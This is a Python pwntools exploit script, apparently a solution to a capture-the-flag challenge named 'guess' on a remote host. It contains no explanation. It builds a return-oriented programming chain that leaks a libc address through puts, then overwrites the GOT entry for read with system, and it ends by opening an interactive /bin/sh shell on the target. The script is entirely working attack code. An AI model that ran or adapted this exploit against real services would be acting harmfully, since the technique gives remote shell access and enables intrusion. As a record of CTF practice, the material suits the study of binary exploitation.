from pwn import *
import os
rand_value = int(os.urandom(4).encode('hex'), 16) % 500
#s = process("./guess")
s = remote("pwnable.shop",10003)
libc = ELF("./libc")
elf = ELF("./guess")
pop_rsi_r15 = 0x00400761
pop_rdi = 0x00400763
s.recvuntil("Input String!")
pay = p64(0x00400778)*65
pay += p64(0x00400763)
pay += p64(elf.got['puts'])
pay += p64(elf.plt['puts'])
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)
pay += p64(elf.plt['read'])
pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.got['read'])
pay += p64(0)
pay += p64(elf.plt['read'])
pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(elf.plt['read'])
s.send(pay)
print s.recvline()
leak = u64(s.recv(6)+'\x00\x00')
print "leak : " + hex(leak)
libc_base = leak - libc.symbols['puts']
one_shot = leak = libc_base + 0xf1147
print "libc_base : " + hex(libc_base)
print "one_shot : " + hex(one_shot)
system = libc_base + libc.symbols['system']
s.send("/bin/sh\x00")
s.send(p64(system))
s.interactive()